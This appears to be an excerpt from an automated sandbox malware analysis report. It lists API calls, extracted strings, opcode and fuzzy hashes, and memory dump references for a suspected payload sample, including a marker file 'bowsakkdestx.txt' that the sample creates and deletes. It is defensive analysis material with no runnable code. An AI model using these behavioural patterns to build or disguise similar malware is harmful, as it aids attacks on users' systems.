                                                                                                  • __lock.LIBCMT ref: 00E617D0
                                                                                                  • __getenv_helper_nolock.LIBCMT ref: 00E617DB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __getenv_helper_nolock$__getptd_noexit__lock_strlen_strnlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 2168648987-0
                                                                                                  • Opcode ID: ddbc87cdc8186200a703696a24fd456c1707e96b9be86876df6610cc29da8a56
                                                                                                  • Instruction ID: e190dc83fdced31b026279023fb964d61be99174b6e9e0706562ee4fdcfe0bcc
                                                                                                  • Opcode Fuzzy Hash: ddbc87cdc8186200a703696a24fd456c1707e96b9be86876df6610cc29da8a56
                                                                                                  • Instruction Fuzzy Hash: 72312972681315ABDB227BA4FC01B9F66E45F06BA4F182196F904FB281DFB4A80052E5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • _malloc.LIBCMT ref: 00E5B70B
                                                                                                    • Part of subcall function 00E40C62: __FF_MSGBANNER.LIBCMT ref: 00E40C79
                                                                                                    • Part of subcall function 00E40C62: __NMSG_WRITE.LIBCMT ref: 00E40C80
                                                                                                    • Part of subcall function 00E40C62: RtlAllocateHeap.NTDLL(00970000,00000000,00000001,00000000,00000000,00000000,?,00E48CF4,00000000,00000000,00000000,00000000,?,00E48BE1,00000018,00F27BD0), ref: 00E40CA5
                                                                                                  • _free.LIBCMT ref: 00E5B71E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocateHeap_free_malloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 1020059152-0
                                                                                                  • Opcode ID: 6a2604fb83e1f41e56bc31b1a120fc0056ea6b6deec9641427e00b383230ef40
                                                                                                  • Instruction ID: 14b00826467fdb7ffde8cb349b140e652d10a3f39115e562b4c53b18d40d771a
                                                                                                  • Opcode Fuzzy Hash: 6a2604fb83e1f41e56bc31b1a120fc0056ea6b6deec9641427e00b383230ef40
                                                                                                  • Instruction Fuzzy Hash: 4711CA32405719AFCB212F74FC85B6A3BD49F89365F102B27FD54BA161DB70884486D4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 00E3F085
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E3F0AC
                                                                                                  • DispatchMessageW.USER32(?), ref: 00E3F0B6
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E3F0C4
                                                                                                  • WaitForSingleObject.KERNEL32(0000000A), ref: 00E3F0D2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                  • String ID:
                                                                                                  • API String ID: 1380987712-0
                                                                                                  • Opcode ID: 358288ea5b64fbe1a182b1143b49ea77f6135f5b85c9fbc2935ac54d63d9d262
                                                                                                  • Instruction ID: 8f8af13ed96bcca8c352fa596440308eba0c1b3b052b569df5a009630779483f
                                                                                                  • Opcode Fuzzy Hash: 358288ea5b64fbe1a182b1143b49ea77f6135f5b85c9fbc2935ac54d63d9d262
                                                                                                  • Instruction Fuzzy Hash: 0201A231A4031C6AEB20DB55EC8AF967B6DAB44B14F204011FA00BF1D1D7B5E90ADBA4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 00E3E515
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E3E53C
                                                                                                  • DispatchMessageW.USER32(?), ref: 00E3E546
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E3E554
                                                                                                  • WaitForSingleObject.KERNEL32(0000000A), ref: 00E3E562
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                  • String ID:
                                                                                                  • API String ID: 1380987712-0
                                                                                                  • Opcode ID: 89af644ed51b759dda8044717aeac1eab063ce4dccc9d910d8940d7f763d6bc9
                                                                                                  • Instruction ID: 26bafb535ddf3c258b14e893cc38de8f08b6020ac2b41d9829b65530763c9868
                                                                                                  • Opcode Fuzzy Hash: 89af644ed51b759dda8044717aeac1eab063ce4dccc9d910d8940d7f763d6bc9
                                                                                                  • Instruction Fuzzy Hash: E201A73174034D7AF620DB51DC8AF96BB6DA744B18F244051FA00BA1D1D6B5A54ACA94
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __flsbuf__flush__getptd_noexit__write
                                                                                                  • String ID:
                                                                                                  • API String ID: 3115901604-2740779761
                                                                                                  • Opcode ID: c801ac2ca2d43139865efb7dfbd9e243acdf2f1ae776db3811a370f6b9bcd5c2
                                                                                                  • Instruction ID: 7e033fa5a5220e6011161d8d675bebffdac68eae7baac361cc13acba47ab6629
                                                                                                  • Opcode Fuzzy Hash: c801ac2ca2d43139865efb7dfbd9e243acdf2f1ae776db3811a370f6b9bcd5c2
                                                                                                  • Instruction Fuzzy Hash: 3841C4317007069FDB388EA9E8805AE77A5FF84364F64A22DFF15E7240E670DD81AB54
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memmove
                                                                                                  • String ID: invalid string position$string too long
                                                                                                  • API String ID: 4104443479-4289949731
                                                                                                  • Opcode ID: 2785488a5fb8dc34edcd135fc14eb49cb3850e5f60edc3627a0dba46f50e59b9
                                                                                                  • Instruction ID: cd57fd63305d7a0638a6580704b86b1d64c0883a384818820a15df56c0053369
                                                                                                  • Opcode Fuzzy Hash: 2785488a5fb8dc34edcd135fc14eb49cb3850e5f60edc3627a0dba46f50e59b9
                                                                                                  • Instruction Fuzzy Hash: CC31E5B13006049BDB28DE48E88996B7BA6EB80714F205A18F865BB7E5D731FD40CB90
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • UuidCreate.RPCRT4(?), ref: 00E2C5DA
                                                                                                  • UuidToStringA.RPCRT4(?,00000000), ref: 00E2C5F6
                                                                                                  • RpcStringFreeA.RPCRT4(00000000), ref: 00E2C640
                                                                                                  Strings
                                                                                                  • 8a4577dc-de55-4eb5-b48a-8a3eee60cd95, xrefs: 00E2C687
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: StringUuid$CreateFree
                                                                                                  • String ID: 8a4577dc-de55-4eb5-b48a-8a3eee60cd95
                                                                                                  • API String ID: 3044360575-2335240114
                                                                                                  • Opcode ID: c390f5b206f48c6dda8fd0c24573b8b798fd49b3d0e852682589fd02c10ff4a1
                                                                                                  • Instruction ID: 1431fdad16dd90d1aa60cb038da7d54fcc90035b497d3b21a9b7ec8339b443ac
                                                                                                  • Opcode Fuzzy Hash: c390f5b206f48c6dda8fd0c24573b8b798fd49b3d0e852682589fd02c10ff4a1
                                                                                                  • Instruction Fuzzy Hash: 712149722083419BD710DF24E809B9FBBE8EF81708F106A6EF485A3291D775D548C793
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00E2C48B
                                                                                                  • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00E2C4A9
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Path$AppendFolder
                                                                                                  • String ID: bowsakkdestx.txt
                                                                                                  • API String ID: 29327785-2616962270
                                                                                                  • Opcode ID: 327e31c716c7c01dc9e74fd6e2c61ef86b912113a4b9559af490739d8916655d
                                                                                                  • Instruction ID: eb9ec682283571182c97179e2d6f7c4fd83dfdf28d6c5a184ce02f5f0135362b
                                                                                                  • Opcode Fuzzy Hash: 327e31c716c7c01dc9e74fd6e2c61ef86b912113a4b9559af490739d8916655d
                                                                                                  • Instruction Fuzzy Hash: A401DB72A8032837D93065A5BC87FFB779C9B51721F0000E6FE08E6181D5A1958A56D2
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00E2C438
                                                                                                  • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00E2C44E
                                                                                                  • DeleteFileA.KERNEL32(?), ref: 00E2C45B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Path$AppendDeleteFileFolder
                                                                                                  • String ID: bowsakkdestx.txt
                                                                                                  • API String ID: 610490371-2616962270
                                                                                                  • Opcode ID: 766ec7371ac6b89bf9193e98bd74ddd816f8755b76e94c9ca242bfa8234dee73
                                                                                                  • Instruction ID: 5cb18cd1882dde3523e703b6761e7d35d09b2693e27759a72d8fe24c57b8e68f
                                                                                                  • Opcode Fuzzy Hash: 766ec7371ac6b89bf9193e98bd74ddd816f8755b76e94c9ca242bfa8234dee73
                                                                                                  • Instruction Fuzzy Hash: 0CE08675A4031C6BEB20ABA1ECCAFD9777CAB04B01F1000D1BB54F60C0D6B0E58D4A51
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00E5C6AD
                                                                                                  • __isleadbyte_l.LIBCMT ref: 00E5C6DB
                                                                                                  • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,E1C11FE1,00BFBBEF,00000000,?,00000000,00000000,?,00E5C0ED,?,00BFBBEF,00000003), ref: 00E5C709
                                                                                                  • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,00BFBBEF,00000000,?,00000000,00000000,?,00E5C0ED,?,00BFBBEF,00000003), ref: 00E5C73F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                  • String ID:
                                                                                                  • API String ID: 3058430110-0
                                                                                                  • Opcode ID: 522d1dd1edb38cf4fc0fec90fdd3715aa2d220fa6155fa81b7074ffdcc24adcc
                                                                                                  • Instruction ID: d63b0087f2a0bf560472324f8abbac0bdd76126cd394538fd3ef2c616b78a036
                                                                                                  • Opcode Fuzzy Hash: 522d1dd1edb38cf4fc0fec90fdd3715aa2d220fa6155fa81b7074ffdcc24adcc
                                                                                                  • Instruction Fuzzy Hash: 7231F230600346EFDB218E75CC94BAA7BB5FF44715F25682AF814AB1A0D770E954DB90
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000,00000000,?,?), ref: 00E2F125
                                                                                                  • lstrlenA.KERNEL32(?,?,00000000), ref: 00E2F198
                                                                                                  • WriteFile.KERNEL32(00000000,?,00000000), ref: 00E2F1A1
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00E2F1A8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: File$CloseCreateHandleWritelstrlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 1421093161-0
                                                                                                  • Opcode ID: 98f9140d52d0c6dec21b79ed8fae424a098153abc744dff772beddd6b67ec74b
                                                                                                  • Instruction ID: bd943f121efb9cbcf1c22fdc50ca0f30a44ef1e71396f37b874a60cda7bfd970
                                                                                                  • Opcode Fuzzy Hash: 98f9140d52d0c6dec21b79ed8fae424a098153abc744dff772beddd6b67ec74b
                                                                                                  • Instruction Fuzzy Hash: 4A31F272D00248EFDB149F68EC4ABAEBBB8EB04704F504128F906771C1D775AA55CBA1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • ___BuildCatchObject.LIBCMT ref: 00EE70AB
                                                                                                    • Part of subcall function 00EE77A0: ___BuildCatchObjectHelper.LIBCMT ref: 00EE77D2
                                                                                                    • Part of subcall function 00EE77A0: ___AdjustPointer.LIBCMT ref: 00EE77E9
                                                                                                  • _UnwindNestedFrames.LIBCMT ref: 00EE70C2
                                                                                                  • ___FrameUnwindToState.LIBCMT ref: 00EE70D4
                                                                                                  • CallCatchBlock.LIBCMT ref: 00EE70F8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                                                                                  • String ID:
                                                                                                  • API String ID: 2901542994-0
                                                                                                  • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                  • Instruction ID: d845eae01ea6a948570f97bdaafd67f33d06a3abf5860e0403f4d24faf098d79
                                                                                                  • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                  • Instruction Fuzzy Hash: F801133200018CBBCF12AF56CC01EDA7FAAEF48758F149014FA5872121D332E961EBA0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                    • Part of subcall function 00E45007: __getptd_noexit.LIBCMT ref: 00E45008
                                                                                                    • Part of subcall function 00E45007: __amsg_exit.LIBCMT ref: 00E45015
                                                                                                  • __calloc_crt.LIBCMT ref: 00E45A01
                                                                                                    • Part of subcall function 00E48C96: __calloc_impl.LIBCMT ref: 00E48CA5
                                                                                                  • __lock.LIBCMT ref: 00E45A37
                                                                                                  • ___addlocaleref.LIBCMT ref: 00E45A43
                                                                                                  • __lock.LIBCMT ref: 00E45A57
                                                                                                    • Part of subcall function 00E45208: __getptd_noexit.LIBCMT ref: 00E45208
